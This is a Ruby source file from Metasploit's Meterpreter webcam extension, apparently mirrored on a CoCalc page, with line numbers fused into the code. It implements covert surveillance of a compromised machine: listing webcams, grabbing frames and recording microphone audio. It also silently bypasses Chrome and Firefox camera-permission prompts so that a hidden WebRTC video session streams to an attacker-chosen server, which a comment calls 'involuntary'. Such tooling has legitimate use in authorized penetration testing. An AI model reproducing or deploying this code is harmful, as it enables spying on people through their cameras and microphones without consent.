CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
Views: 1904
# -*- coding: binary -*-12module Rex3module Post4module Meterpreter5module Extensions6module Stdapi7module Webcam89###10#11# This meterpreter extension can list and capture from webcams and/or microphone12#13###14class Webcam15include Msf::Post::Common16include Msf::Post::File17include Msf::Post::WebRTC1819def initialize(client)20@client = client21end2223def session24@client25end2627def webcam_list28response = client.send_request(Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_LIST))29names = []30response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|31names << tlv.value32end33names34end3536# Starts recording video from video source of index +cam+37def webcam_start(cam)38request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_START)39request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)40client.send_request(request)41true42end4344def webcam_get_frame(quality)45request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_GET_FRAME)46request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)47response = client.send_request(request)48response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value49end5051def webcam_stop52client.send_request(Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_STOP))53true54end5556#57# Starts a webcam session with a remote user via WebRTC58#59# @param server [String] A server to use for the channel.60# @return void61#62def webcam_chat(server)63offerer_id = Rex::Text.rand_text_alphanumeric(10)64channel = Rex::Text.rand_text_alphanumeric(20)6566remote_browser_path = webrtc_browser_path6768if remote_browser_path.to_s.strip.empty?69fail "Unable to find a suitable browser on the target machine"70end7172init_video_chat(remote_browser_path, server, channel, offerer_id)73connect_video_chat(server, channel, offerer_id)74end7576# Record from default audio source for +duration+ seconds;77# returns a low-quality wav file78def record_mic(duration)79request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD)80request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)81response = client.send_request(request)82response.get_tlv(TLV_TYPE_AUDIO_DATA).value83end8485attr_accessor :client8687private8889#90# Returns a browser path that supports WebRTC91#92# @return [String]93#94def webrtc_browser_path95found_browser_path = ''9697case client.platform98when /win/99paths = [100"%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",101"%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",102"%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",103"%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",104"%ProgramFiles%\\Mozilla Firefox\\firefox.exe",105"%ProgramW6432%\\Mozilla Firefox\\firefox.exe"106]107108# Old chrome path109user_profile = client.sys.config.getenv("USERPROFILE")110paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"111112paths.each do |browser_path|113if file?(browser_path)114found_browser_path = browser_path115break116end117end118119when /osx|bsd/120[121'/Applications/Google Chrome.app',122'/Applications/Firefox.app'123].each do |browser_path|124if file?(browser_path)125found_browser_path = browser_path126break127end128end129when /linux|unix/130# Need to add support for Linux in the future.131# But you see, the Linux meterpreter is so broken there is no point132# to do it now. You can't test anyway.133end134135found_browser_path136end137138#139# Creates a video chat session as an offerer... involuntarily :-p140# Windows targets only.141#142# @param remote_browser_path [String] A browser path that supports WebRTC on the target machine143# @param offerer_id [String] A ID that the answerer can look for and join144#145def init_video_chat(remote_browser_path, server, channel, offerer_id)146interface = load_interface('offerer.html')147api = load_api_code148149interface = interface.gsub(/\=SERVER\=/, server)150interface = interface.gsub(/\=CHANNEL\=/, channel)151interface = interface.gsub(/\=OFFERERID\=/, offerer_id)152153tmp_dir = session.sys.config.getenv("TEMP")154155begin156write_file("#{tmp_dir}\\interface.html", interface)157write_file("#{tmp_dir}\\api.js", api)158rescue RuntimeError => e159elog('webcam_chat failed', error: e)160raise "Unable to initialize the interface on the target machine"161end162163#164# Automatically allow the webcam to run on the target machine165#166args = ''167if remote_browser_path =~ /Chrome/168args = "--allow-file-access-from-files --use-fake-ui-for-media-stream"169elsif remote_browser_path =~ /Firefox/170profile_name = Rex::Text.rand_text_alpha(8)171o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")172profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip173setting = %|user_pref("media.navigator.permission.disabled", true);|174begin175write_file(profile_path, setting)176rescue RuntimeError => e177elog('webcam_chat failed', error: e)178raise "Unable to write the necessary setting for Firefox."179end180args = "-p #{profile_name}"181end182183exec_opts = { 'Hidden' => false, 'Channelized' => false }184185begin186session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)187rescue RuntimeError => e188elog('webcam_chat failed', error: e)189raise "Unable to start the remote browser: #{e.message}"190end191end192end193end194end195end196end197end198end199200201